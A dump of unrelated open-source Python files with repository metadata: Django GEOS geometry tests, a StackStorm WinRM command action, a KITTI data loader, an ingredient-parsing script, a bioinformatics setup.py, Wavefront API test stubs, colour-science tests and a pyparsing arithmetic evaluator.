s = str(poly) # Still accessible
self.assertEqual(mpoly[i], poly)
self.assertNotEqual(mpoly[i], old_poly)
# Extreme (!!) __setitem__ -- no longer works, have to detect
# in the first object that __setitem__ is called in the subsequent
# objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
#mpoly[0][0][0] = (3.14, 2.71)
#self.assertEqual((3.14, 2.71), mpoly[0][0][0])
# Doing it more slowly..
#self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
#del mpoly
def test17_threed(self):
"Testing three-dimensional geometries."
# Testing a 3D Point
pnt = Point(2, 3, 8)
self.assertEqual((2.,3.,8.), pnt.coords)
self.assertRaises(TypeError, pnt.set_coords, (1.,2.))
pnt.coords = (1.,2.,3.)
self.assertEqual((1.,2.,3.), pnt.coords)
# Testing a 3D LineString
ls = LineString((2., 3., 8.), (50., 250., -117.))
self.assertEqual(((2.,3.,8.), (50.,250.,-117.)), ls.tuple)
self.assertRaises(TypeError, ls.__setitem__, 0, (1.,2.))
ls[0] = (1.,2.,3.)
self.assertEqual((1.,2.,3.), ls[0])
def test18_distance(self):
"Testing the distance() function."
# Distance to self should be 0.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.distance(Point(0, 0)))
# Distance should be 1
self.assertEqual(1.0, pnt.distance(Point(0, 1)))
# Distance should be ~ sqrt(2)
self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
# Distances are from the closest vertex in each geometry --
# should be 3 (distance from (2, 2) to (5, 2)).
ls1 = LineString((0, 0), (1, 1), (2, 2))
ls2 = LineString((5, 2), (6, 1), (7, 0))
self.assertEqual(3, ls1.distance(ls2))
def test19_length(self):
"Testing the length property."
# Points have 0 length.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.length)
# Should be ~ sqrt(2)
ls = LineString((0, 0), (1, 1))
self.assertAlmostEqual(1.41421356237, ls.length, 11)
# Should be circumfrence of Polygon
poly = Polygon(LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
self.assertEqual(4.0, poly.length)
# Should be sum of each element's length in collection.
mpoly = MultiPolygon(poly.clone(), poly)
self.assertEqual(8.0, mpoly.length)
def test20a_emptyCollections(self):
"Testing empty geometries and collections."
gc1 = GeometryCollection([])
gc2 = fromstr('GEOMETRYCOLLECTION EMPTY')
pnt = fromstr('POINT EMPTY')
ls = fromstr('LINESTRING EMPTY')
poly = fromstr('POLYGON EMPTY')
mls = fromstr('MULTILINESTRING EMPTY')
mpoly1 = fromstr('MULTIPOLYGON EMPTY')
mpoly2 = MultiPolygon(())
for g in [gc1, gc2, pnt, ls, poly, mls, mpoly1, mpoly2]:
self.assertEqual(True, g.empty)
# Testing len() and num_geom.
if isinstance(g, Polygon):
self.assertEqual(1, len(g)) # Has one empty linear ring
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g[0]))
elif isinstance(g, (Point, LineString)):
self.assertEqual(1, g.num_geom)
self.assertEqual(0, len(g))
else:
self.assertEqual(0, g.num_geom)
self.assertEqual(0, len(g))
# Testing __getitem__ (doesn't work on Point or Polygon)
if isinstance(g, Point):
self.assertRaises(GEOSIndexError, g.get_x)
elif isinstance(g, Polygon):
lr = g.shell
self.assertEqual('LINEARRING EMPTY', lr.wkt)
self.assertEqual(0, len(lr))
self.assertEqual(True, lr.empty)
self.assertRaises(GEOSIndexError, lr.__getitem__, 0)
else:
self.assertRaises(GEOSIndexError, g.__getitem__, 0)
def test20b_collections_of_collections(self):
"Testing GeometryCollection handling of other collections."
# Creating a GeometryCollection WKT string composed of other
# collections and polygons.
coll = [mp.wkt for mp in self.geometries.multipolygons if mp.valid]
coll.extend([mls.wkt for mls in self.geometries.multilinestrings])
coll.extend([p.wkt for p in self.geometries.polygons])
coll.extend([mp.wkt for mp in self.geometries.multipoints])
gc_wkt = 'GEOMETRYCOLLECTION(%s)' % ','.join(coll)
# Should construct ok from WKT
gc1 = GEOSGeometry(gc_wkt)
# Should also construct ok from individual geometry arguments.
gc2 = GeometryCollection(*tuple(g for g in gc1))
# And, they should be equal.
self.assertEqual(gc1, gc2)
def test21_test_gdal(self):
"Testing `ogr` and `srs` properties."
if not gdal.HAS_GDAL: return
g1 = fromstr('POINT(5 23)')
self.assertEqual(True, isinstance(g1.ogr, gdal.OGRGeometry))
self.assertEqual(g1.srs, None)
g2 = fromstr('LINESTRING(0 0, 5 5, 23 23)', srid=4326)
self.assertEqual(True, isinstance(g2.ogr, gdal.OGRGeometry))
self.assertEqual(True, isinstance(g2.srs, gdal.SpatialReference))
self.assertEqual(g2.hex, g2.ogr.hex)
self.assertEqual('WGS 84', g2.srs.name)
def test22_copy(self):
"Testing use with the Python `copy` module."
import copy
poly = GEOSGeometry('POLYGON((0 0, 0 23, 23 23, 23 0, 0 0), (5 5, 5 10, 10 10, 10 5, 5 5))')
cpy1 = copy.copy(poly)
cpy2 = copy.deepcopy(poly)
self.assertNotEqual(poly._ptr, cpy1._ptr)
self.assertNotEqual(poly._ptr, cpy2._ptr)
def test23_transform(self):
"Testing `transform` method."
if not gdal.HAS_GDAL: return
orig = GEOSGeometry('POINT (-104.609 38.255)', 4326)
trans = GEOSGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using a srid, a SpatialReference object, and a CoordTransform object
# for transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(gdal.SpatialReference('EPSG:2774'))
ct = gdal.CoordTransform(gdal.SpatialReference('WGS84'), gdal.SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
prec = 3
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test23_transform_noop(self):
""" Testing `transform` method (SRID match) """
# transform() should no-op if source & dest SRIDs match,
# regardless of whether GDAL is available.
if gdal.HAS_GDAL:
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
gt = g.tuple
g.transform(4326)
self.assertEqual(g.tuple, gt)
self.assertEqual(g.srid, 4326)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
g1 = g.transform(4326, clone=True)
self.assertEqual(g1.tuple, g.tuple)
self.assertEqual(g1.srid, 4326)
self.assertTrue(g1 is not g, "Clone didn't happen")
old_has_gdal = gdal.HAS_GDAL
try:
gdal.HAS_GDAL = False
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
gt = g.tuple
g.transform(4326)
self.assertEqual(g.tuple, gt)
self.assertEqual(g.srid, 4326)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
g1 = g.transform(4326, clone=True)
self.assertEqual(g1.tuple, g.tuple)
self.assertEqual(g1.srid, 4326)
self.assertTrue(g1 is not g, "Clone didn't happen")
finally:
gdal.HAS_GDAL = old_has_gdal
def test23_transform_nosrid(self):
""" Testing `transform` method (no SRID or negative SRID) """
g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
self.assertRaises(GEOSException, g.transform, 2774)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=None)
self.assertRaises(GEOSException, g.transform, 2774, clone=True)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
self.assertRaises(GEOSException, g.transform, 2774)
g = GEOSGeometry('POINT (-104.609 38.255)', srid=-1)
self.assertRaises(GEOSException, g.transform, 2774, clone=True)
def test23_transform_nogdal(self):
""" Testing `transform` method (GDAL not available) """
old_has_gdal = gdal.HAS_GDAL
try:
gdal.HAS_GDAL = False
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
self.assertRaises(GEOSException, g.transform, 2774)
g = GEOSGeometry('POINT (-104.609 38.255)', 4326)
self.assertRaises(GEOSException, g.transform, 2774, clone=True)
finally:
gdal.HAS_GDAL = old_has_gdal
def test24_extent(self):
"Testing `extent` method."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = MultiPoint(Point(5, 23), Point(0, 0), Point(10, 50))
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
pnt = Point(5.23, 17.8)
# Extent of points is just the point itself repeated.
self.assertEqual((5.23, 17.8, 5.23, 17.8), pnt.extent)
# Testing on the 'real world' Polygon.
poly = fromstr(self.geometries.polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test25_pickle(self):
"Testing pickling and unpickling support."
# Using both pickle and cPickle -- just 'cause.
import pickle, cPickle
# Creating a list of test geometries for pickling,
# and setting the SRID on some of them.
def get_geoms(lst, srid=None):
return [GEOSGeometry(tg.wkt, srid) for tg in lst]
tgeoms = get_geoms(self.geometries.points)
tgeoms.extend(get_geoms(self.geometries.multilinestrings, 4326))
tgeoms.extend(get_geoms(self.geometries.polygons, 3084))
tgeoms.extend(get_geoms(self.geometries.multipolygons, 900913))
# The SRID won't be exported in GEOS 3.0 release candidates.
no_srid = self.null_srid == -1
for geom in tgeoms:
s1, s2 = cPickle.dumps(geom), pickle.dumps(geom)
g1, g2 = cPickle.loads(s1), pickle.loads(s2)
for tmpg in (g1, g2):
self.assertEqual(geom, tmpg)
if not no_srid: self.assertEqual(geom.srid, tmpg.srid)
def test26_prepared(self):
"Testing PreparedGeometry support."
if not GEOS_PREPARE: return
# Creating a simple multipolygon and getting a prepared version.
mpoly = GEOSGeometry('MULTIPOLYGON(((0 0,0 5,5 5,5 0,0 0)),((5 5,5 10,10 10,10 5,5 5)))')
prep = mpoly.prepared
# A set of test points.
pnts = [Point(5, 5), Point(7.5, 7.5), Point(2.5, 7.5)]
covers = [True, True, False] # No `covers` op for regular GEOS geoms.
for pnt, c in zip(pnts, covers):
# Results should be the same (but faster)
self.assertEqual(mpoly.contains(pnt), prep.contains(pnt))
self.assertEqual(mpoly.intersects(pnt), prep.intersects(pnt))
self.assertEqual(c, prep.covers(pnt))
def test26_line_merge(self):
"Testing line merge support"
ref_geoms = (fromstr('LINESTRING(1 1, 1 1, 3 3)'),
fromstr('MULTILINESTRING((1 1, 3 3), (3 3, 4 2))'),
)
ref_merged = (fromstr('LINESTRING(1 1, 3 3)'),
fromstr('LINESTRING (1 1, 3 3, 4 2)'),
)
for geom, merged in zip(ref_geoms, ref_merged):
self.assertEqual(merged, geom.merged)
def test27_valid_reason(self):
"Testing IsValidReason support"
# Skipping tests if GEOS < v3.1.
if not GEOS_PREPARE: return
g = GEOSGeometry("POINT(0 0)")
self.assertTrue(g.valid)
self.assertTrue(isinstance(g.valid_reason, basestring))
self.assertEqual(g.valid_reason, "Valid Geometry")
print("\nBEGIN - expecting GEOS_NOTICE; safe to ignore.\n")
g = GEOSGeometry("LINESTRING(0 0, 0 0)")
self.assertTrue(not g.valid)
self.assertTrue(isinstance(g.valid_reason, basestring))
self.assertTrue(g.valid_reason.startswith("Too few points in geometry component"))
print("\nEND - expecting GEOS_NOTICE; safe to ignore.\n")
def test28_geos_version(self):
"Testing the GEOS version regular expression."
from django.contrib.gis.geos.libgeos import version_regex
versions = [ ('3.0.0rc4-CAPI-1.3.3', '3.0.0'),
('3.0.0-CAPI-1.4.1', '3.0.0'),
('3.4.0dev-CAPI-1.8.0', '3.4.0') ]
for v, expected in versions:
m = version_regex.match(v)
self.assertTrue(m)
self.assertEqual(m.group('version'), expected)
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GEOSTest))
return s
def run(verbosity=2):
unittest.TextTestRunner(verbosity=verbosity).run(suite())
| 40.993184
| 121
| 0.589287
|
4a04d186693ce004c4d673386d0582c0ab745e4e
| 982
|
py
|
Python
|
packs/windows/actions/winrm_cmd.py
|
userlocalhost2000/st2contrib
|
1a5f759e76401743ed9023d298a3d767e3885db1
|
[
"Apache-2.0"
] | 164
|
2015-01-17T16:08:33.000Z
|
2021-08-03T02:34:07.000Z
|
packs/windows/actions/winrm_cmd.py
|
userlocalhost2000/st2contrib
|
1a5f759e76401743ed9023d298a3d767e3885db1
|
[
"Apache-2.0"
] | 442
|
2015-01-01T11:19:01.000Z
|
2017-09-06T23:26:17.000Z
|
packs/windows/actions/winrm_cmd.py
|
userlocalhost2000/st2contrib
|
1a5f759e76401743ed9023d298a3d767e3885db1
|
[
"Apache-2.0"
] | 202
|
2015-01-13T00:37:40.000Z
|
2020-11-07T11:30:10.000Z
|
from winrm.protocol import Protocol
from st2actions.runners.pythonrunner import Action
__all__ = [
'WinRMCmdAction'
]
class WinRMCmdAction(Action):
def run(self, host, password, command, params, username='Administrator',
port=5732, secure=True):
proto = 'https' if secure else 'http'
p = Protocol(
endpoint='%s://%s:%i/wsman' % (proto, host, port), # RFC 2732?
transport='ntlm',
username=username,
password=password,
server_cert_validation='ignore')
shell_id = p.open_shell()
# run the command
command_id = p.run_command(shell_id, command, params)
std_out, std_err, status_code = p.get_command_output(shell_id,
command_id)
p.cleanup_command(shell_id, command_id)
p.close_shell(shell_id)
return {'stdout': std_out, 'stderr': std_err}
| 32.733333
| 77
| 0.57332
|
4a04d1bdb1889a3e34b24add11b629884f782152
| 1,305
|
py
|
Python
|
Kitti_loader/kitti_dataset/data_loader.py
|
Jonas-LUOJIAN/KITTI-DepthCompletion-DataLoader
|
499ed92834c77c8c4f74dc3c057d4d4bd6bc7b51
|
[
"MIT"
] | 1
|
2021-12-17T12:26:24.000Z
|
2021-12-17T12:26:24.000Z
|
Kitti_loader/kitti_dataset/data_loader.py
|
Jonas-LUOJIAN/KITTI-DepthCompletion-DataLoader
|
499ed92834c77c8c4f74dc3c057d4d4bd6bc7b51
|
[
"MIT"
] | null | null | null |
Kitti_loader/kitti_dataset/data_loader.py
|
Jonas-LUOJIAN/KITTI-DepthCompletion-DataLoader
|
499ed92834c77c8c4f74dc3c057d4d4bd6bc7b51
|
[
"MIT"
] | null | null | null |
from kitti_dataset.kitti_loader import Kitti_dataset, Kitti_Dataset
from torch.utils.data import DataLoader
import random
# dataset_path = "D:/kitti"
# kitti = Kitti_dataset(dataset_path)
# print(kitti.train_paths)
# kitti.read_kitti_from_local()
#
# kitti_train = Kitti_Dataset(kitti.train_paths, transform=True)
# kitti_val = Kitti_Dataset(kitti.val_paths)
# kitti_selection = Kitti_Dataset(kitti.selected_paths)
# kitti_test = Kitti_Dataset(kitti.test_files)
def get_loader(kitti_train, kitti_val, kitti_selection, batch_size=5):
"""
Define the different dataloaders for training and validation
"""
train_loader = DataLoader(
kitti_train, batch_size=batch_size, sampler=None,
shuffle=True, num_workers=8,
pin_memory=True, drop_last=True)
val_loader = DataLoader(
kitti_val, batch_size=batch_size, sampler=None,
shuffle=True, num_workers=0,
pin_memory=True, drop_last=True)
val_selection_loader = DataLoader(
kitti_selection, batch_size=batch_size, shuffle=False,
num_workers=0, pin_memory=True, drop_last=True)
return train_loader, val_loader, val_selection_loader
# train_loader, val_loader, val_selection_loader = get_loader(kitti_train, kitti_val, kitti_selection)
| 36.25
| 103
| 0.737931
|
4a04d295a72c2424fd2e0d9129f96492e37146ca
| 825
|
py
|
Python
|
bin/parse-ingredient-text.py
|
tiger1021/ingredient-phrase-tagger
|
71fba65aa99eacb9860bb9eeee6409236c10f0e1
|
[
"Apache-2.0"
] | null | null | null |
bin/parse-ingredient-text.py
|
tiger1021/ingredient-phrase-tagger
|
71fba65aa99eacb9860bb9eeee6409236c10f0e1
|
[
"Apache-2.0"
] | null | null | null |
bin/parse-ingredient-text.py
|
tiger1021/ingredient-phrase-tagger
|
71fba65aa99eacb9860bb9eeee6409236c10f0e1
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import sys
import os
import tempfile
import StringIO
import json
import subprocess
from ingredient_phrase_tagger.training import utils
if len(sys.argv) < 2:
sys.stderr.write('Usage: parse-ingredients.py TEXT')
sys.exit(1)
text = sys.argv[1]
_, tmpFile = tempfile.mkstemp()
string_file = StringIO.StringIO(text)
text_file = open(tmpFile, "wt")
text_file.write(utils.export_data(string_file.readlines()))
text_file.close()
tmpFilePath = "../tmp/model_file"
modelFilename = os.path.join(os.path.dirname(__file__), tmpFilePath)
results = StringIO.StringIO(subprocess.check_output(["crf_test", "-v", "1", "-m", modelFilename, tmpFile]))
os.system("rm %s" % tmpFile)
results_json = (json.dumps(utils.import_data(results), indent=4))
print(results_json)
| 23.571429
| 107
| 0.753939
|
4a04d2f43285c142f805c78a0d42021b4dbef0a8
| 1,801
|
py
|
Python
|
setup.py
|
HopeLapointe/fieldbioinformatics
|
c67295329b56a1bec0ae11ec0d12275a23badf54
|
[
"MIT"
] | null | null | null |
setup.py
|
HopeLapointe/fieldbioinformatics
|
c67295329b56a1bec0ae11ec0d12275a23badf54
|
[
"MIT"
] | null | null | null |
setup.py
|
HopeLapointe/fieldbioinformatics
|
c67295329b56a1bec0ae11ec0d12275a23badf54
|
[
"MIT"
] | null | null | null |
import os
from setuptools import setup
version_py = os.path.join(os.path.dirname(__file__), 'artic', 'version.py')
version = open(version_py).read().strip().split(
'=')[-1].replace('"', '').strip()
long_description = """
``artic`` is a pipeline for working with virus sequencing data sequenced with nanopore
"""
HERE = os.path.dirname(__file__)
with open(os.path.join(HERE, "requirements.txt"), "r") as f:
install_requires = [x.strip() for x in f.readlines()]
setup(
name="artic",
version=version,
install_requires=install_requires,
requires=['python (>=3.5)'],
packages=['artic'],
author="Nick Loman",
description='A toolset for working with nanopore sequencing data',
long_description=long_description,
url="https://artic.network/ncov-2019/ncov2019-bioinformatics-sop.html",
package_dir={'artic': "artic"},
package_data={'artic': []},
zip_safe=False,
include_package_data=True,
entry_points={
'console_scripts': [
'artic=artic.pipeline:main',
'align_trim=artic.align_trim:main',
'align_trim_n=artic.align_trim_n:main',
'margin_cons=artic.margin_cons:main',
'margin_cons_medaka=artic.margin_cons_medaka:main',
'vcfextract=artic.vcfextract:main',
'artic_vcf_merge=artic.vcf_merge:main',
'artic_vcf_filter=artic.vcf_filter:main',
'artic_make_depth_mask=artic.make_depth_mask:main',
'artic_fasta_header=artic.fasta_header:main'
],
},
author_email="n.j.loman@bham.ac.uk",
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT',
'Topic :: Scientific/Engineering :: Bio-Informatics'
]
)
| 34.634615
| 86
| 0.649084
|
4a04d2f761d22a62a0286e2ec724c0ed67ce8031
| 3,416
|
py
|
Python
|
test/test_derived_metric_api.py
|
mdennehy/python-client
|
4d9cfa32075a6a65d88a38fe9e72b282e87b8808
|
[
"Apache-2.0"
] | null | null | null |
test/test_derived_metric_api.py
|
mdennehy/python-client
|
4d9cfa32075a6a65d88a38fe9e72b282e87b8808
|
[
"Apache-2.0"
] | null | null | null |
test/test_derived_metric_api.py
|
mdennehy/python-client
|
4d9cfa32075a6a65d88a38fe9e72b282e87b8808
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Wavefront REST API
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import wavefront_api_client
from wavefront_api_client.api.derived_metric_api import DerivedMetricApi # noqa: E501
from wavefront_api_client.rest import ApiException
class TestDerivedMetricApi(unittest.TestCase):
"""DerivedMetricApi unit test stubs"""
def setUp(self):
self.api = wavefront_api_client.api.derived_metric_api.DerivedMetricApi() # noqa: E501
def tearDown(self):
pass
def test_add_tag_to_derived_metric(self):
"""Test case for add_tag_to_derived_metric
Add a tag to a specific Derived Metric # noqa: E501
"""
pass
def test_create_derived_metric(self):
"""Test case for create_derived_metric
Create a specific derived metric definition # noqa: E501
"""
pass
def test_delete_derived_metric(self):
"""Test case for delete_derived_metric
Delete a specific derived metric definition # noqa: E501
"""
pass
def test_get_all_derived_metrics(self):
"""Test case for get_all_derived_metrics
Get all derived metric definitions for a customer # noqa: E501
"""
pass
def test_get_derived_metric(self):
"""Test case for get_derived_metric
Get a specific registered query # noqa: E501
"""
pass
def test_get_derived_metric_by_version(self):
"""Test case for get_derived_metric_by_version
Get a specific historical version of a specific derived metric definition # noqa: E501
"""
pass
def test_get_derived_metric_history(self):
"""Test case for get_derived_metric_history
Get the version history of a specific derived metric definition # noqa: E501
"""
pass
def test_get_derived_metric_tags(self):
"""Test case for get_derived_metric_tags
Get all tags associated with a specific derived metric definition # noqa: E501
"""
pass
def test_remove_tag_from_derived_metric(self):
"""Test case for remove_tag_from_derived_metric
Remove a tag from a specific Derived Metric # noqa: E501
"""
pass
def test_set_derived_metric_tags(self):
"""Test case for set_derived_metric_tags
Set all tags associated with a specific derived metric definition # noqa: E501
"""
pass
def test_undelete_derived_metric(self):
"""Test case for undelete_derived_metric
Undelete a specific derived metric definition # noqa: E501
"""
pass
def test_update_derived_metric(self):
"""Test case for update_derived_metric
Update a specific derived metric definition # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 28.705882
| 409
| 0.679157
|
4a04d41ebd60c8f9a623a91b07f9ccffab4035a1
| 657
|
py
|
Python
|
models/__init__.py
|
ChenWang8750/WTAM_net
|
b5c01b9ebc2514cf6fc8ce45c0944b79f0c2a54d
|
[
"MIT"
] | 4
|
2021-07-12T23:28:21.000Z
|
2021-07-25T02:16:50.000Z
|
models/__init__.py
|
ChenWang8750/WTAM_net
|
b5c01b9ebc2514cf6fc8ce45c0944b79f0c2a54d
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
ChenWang8750/WTAM_net
|
b5c01b9ebc2514cf6fc8ce45c0944b79f0c2a54d
|
[
"MIT"
] | null | null | null |
def create_model(opt):
model = None
print(opt.model)
if opt.model == 'MuFA_Net':
assert (opt.dataset_mode == 'aligned' or opt.dataset_mode == 'aligned_resized')
from models.net_models.MuFANet_model import MuFANetModel
model = MuFANetModel()
elif opt.model == 'WTAM':
assert (opt.dataset_mode == 'aligned' or opt.dataset_mode == 'aligned_resized')
from models.net_models.WTAM_model import WTAMModel
model = WTAMModel()
else:
raise ValueError("Model [%s] not recognized." % opt.model)
model.initialize(opt)
print("model [%s] was created" % (model.name()))
return model
| 34.578947
| 87
| 0.648402
|
4a04d51ba9098f83a85822c0ec308c1aaf932cf1
| 2,729
|
py
|
Python
|
colour/volume/tests/test_macadam_limits.py
|
rift-labs-developer/colour
|
15112dbe824aab0f21447e0db4a046a28a06f43a
|
[
"BSD-3-Clause"
] | 1,380
|
2015-01-10T12:30:33.000Z
|
2022-03-30T10:19:57.000Z
|
colour/volume/tests/test_macadam_limits.py
|
rift-labs-developer/colour
|
15112dbe824aab0f21447e0db4a046a28a06f43a
|
[
"BSD-3-Clause"
] | 638
|
2015-01-02T10:49:05.000Z
|
2022-03-29T10:16:22.000Z
|
colour/volume/tests/test_macadam_limits.py
|
rift-labs-developer/colour
|
15112dbe824aab0f21447e0db4a046a28a06f43a
|
[
"BSD-3-Clause"
] | 250
|
2015-01-21T15:27:19.000Z
|
2022-03-30T10:23:58.000Z
|
# -*- coding: utf-8 -*-
"""
Defines the unit tests for the :mod:`colour.volume.macadam_limits` module.
"""
import numpy as np
import unittest
from itertools import permutations
from colour.volume import is_within_macadam_limits
from colour.utilities import ignore_numpy_errors
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['TestIsWithinMacadamLimits']
class TestIsWithinMacadamLimits(unittest.TestCase):
"""
Defines :func:`colour.volume.macadam_limits.is_within_macadam_limits`
definition unit tests methods.
"""
def test_is_within_macadam_limits(self):
"""
Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
definition.
"""
self.assertTrue(
is_within_macadam_limits(np.array([0.3205, 0.4131, 0.5100]), 'A'))
self.assertFalse(
is_within_macadam_limits(np.array([0.0005, 0.0031, 0.0010]), 'A'))
self.assertTrue(
is_within_macadam_limits(np.array([0.4325, 0.3788, 0.1034]), 'C'))
self.assertFalse(
is_within_macadam_limits(np.array([0.0025, 0.0088, 0.0340]), 'C'))
def test_n_dimensional_is_within_macadam_limits(self):
"""
Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
definition n-dimensional arrays support.
"""
a = np.array([0.3205, 0.4131, 0.5100])
b = is_within_macadam_limits(a, 'A')
a = np.tile(a, (6, 1))
b = np.tile(b, 6)
np.testing.assert_almost_equal(is_within_macadam_limits(a, 'A'), b)
a = np.reshape(a, (2, 3, 3))
b = np.reshape(b, (2, 3))
np.testing.assert_almost_equal(is_within_macadam_limits(a, 'A'), b)
def test_raise_exception_is_within_macadam_limits(self):
"""
Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
definition raised exception.
"""
self.assertRaises(KeyError, is_within_macadam_limits,
np.array([0.3205, 0.4131, 0.5100]), 'B')
@ignore_numpy_errors
def test_nan_is_within_macadam_limits(self):
"""
Tests :func:`colour.volume.macadam_limits.is_within_macadam_limits`
definition nan support.
"""
cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]
cases = set(permutations(cases * 3, r=3))
for case in cases:
is_within_macadam_limits(case, 'A')
if __name__ == '__main__':
unittest.main()
| 31.011364
| 78
| 0.652986
|
4a04d6f0ee0194532abd1a2bc453b13410755aab
| 325
|
py
|
Python
|
Codes/Math/perfect_number.py
|
datta-agni/python-codes
|
d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b
|
[
"MIT"
] | null | null | null |
Codes/Math/perfect_number.py
|
datta-agni/python-codes
|
d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b
|
[
"MIT"
] | null | null | null |
Codes/Math/perfect_number.py
|
datta-agni/python-codes
|
d902d0aaf23d2ea4b60ed7ecab0d593e3334c23b
|
[
"MIT"
] | null | null | null |
def perfect_number(number: int) -> bool:
sum: int = 0
for x in range(1, number):
if number % x == 0:
sum += x
return sum == number
if __name__ == "__main__":
print(
perfect_number(
int(input("Enter the number to check for perfect number : "))
)
)
| 21.666667
| 73
| 0.510769
|
4a04d8d85f77a8d7f657e505ececdd24908bbec2
| 7,104
|
py
|
Python
|
examples/eval_arith.py
|
schlichtanders/pyparsing-2.0.3-OrderedDict
|
50bb1a10b63ac623ef58ffa3ee59bb08be172ff4
|
[
"MIT"
] | null | null | null |
examples/eval_arith.py
|
schlichtanders/pyparsing-2.0.3-OrderedDict
|
50bb1a10b63ac623ef58ffa3ee59bb08be172ff4
|
[
"MIT"
] | null | null | null |
examples/eval_arith.py
|
schlichtanders/pyparsing-2.0.3-OrderedDict
|
50bb1a10b63ac623ef58ffa3ee59bb08be172ff4
|
[
"MIT"
] | null | null | null |
# eval_arith.py
#
# Copyright 2009, 2011 Paul McGuire
#
# Expansion on the pyparsing example simpleArith.py, to include evaluation
# of the parsed tokens.
#
# Added support for exponentiation, using right-to-left evaluation of
# operands
#
from pyparsingOD import Word, nums, alphas, Combine, oneOf, \
opAssoc, operatorPrecedence, Literal
class EvalConstant(object):
"Class to evaluate a parsed constant or variable"
vars_ = {}
def __init__(self, tokens):
self.value = tokens[0]
def eval(self):
if self.value in EvalConstant.vars_:
return EvalConstant.vars_[self.value]
else:
return float(self.value)
class EvalSignOp(object):
"Class to evaluate expressions with a leading + or - sign"
def __init__(self, tokens):
self.sign, self.value = tokens[0]
def eval(self):
mult = {'+':1, '-':-1}[self.sign]
return mult * self.value.eval()
def operatorOperands(tokenlist):
"generator to extract operators and operands in pairs"
it = iter(tokenlist)
while 1:
try:
yield (next(it), next(it))
except StopIteration:
break
class EvalPowerOp(object):
"Class to evaluate multiplication and division expressions"
def __init__(self, tokens):
self.value = tokens[0]
def eval(self):
res = self.value[-1].eval()
for val in self.value[-3::-2]:
res = val.eval()**res
return res
class EvalMultOp(object):
"Class to evaluate multiplication and division expressions"
def __init__(self, tokens):
self.value = tokens[0]
def eval(self):
prod = self.value[0].eval()
for op,val in operatorOperands(self.value[1:]):
if op == '*':
prod *= val.eval()
if op == '/':
prod /= val.eval()
return prod
class EvalAddOp(object):
"Class to evaluate addition and subtraction expressions"
def __init__(self, tokens):
self.value = tokens[0]
def eval(self):
sum = self.value[0].eval()
for op,val in operatorOperands(self.value[1:]):
if op == '+':
sum += val.eval()
if op == '-':
sum -= val.eval()
return sum
class EvalComparisonOp(object):
"Class to evaluate comparison expressions"
opMap = {
"<" : lambda a,b : a < b,
"<=" : lambda a,b : a <= b,
">" : lambda a,b : a > b,
">=" : lambda a,b : a >= b,
"!=" : lambda a,b : a != b,
"=" : lambda a,b : a == b,
"LT" : lambda a,b : a < b,
"LE" : lambda a,b : a <= b,
"GT" : lambda a,b : a > b,
"GE" : lambda a,b : a >= b,
"NE" : lambda a,b : a != b,
"EQ" : lambda a,b : a == b,
"<>" : lambda a,b : a != b,
}
def __init__(self, tokens):
self.value = tokens[0]
def eval(self):
val1 = self.value[0].eval()
for op,val in operatorOperands(self.value[1:]):
fn = EvalComparisonOp.opMap[op]
val2 = val.eval()
if not fn(val1,val2):
break
val1 = val2
else:
return True
return False
# define the parser
integer = Word(nums)
real = Combine(Word(nums) + "." + Word(nums))
variable = Word(alphas,exact=1)
operand = real | integer | variable
signop = oneOf('+ -')
multop = oneOf('* /')
plusop = oneOf('+ -')
expop = Literal('**')
# use parse actions to attach EvalXXX constructors to sub-expressions
operand.setParseAction(EvalConstant)
arith_expr = operatorPrecedence(operand,
[
(signop, 1, opAssoc.RIGHT, EvalSignOp),
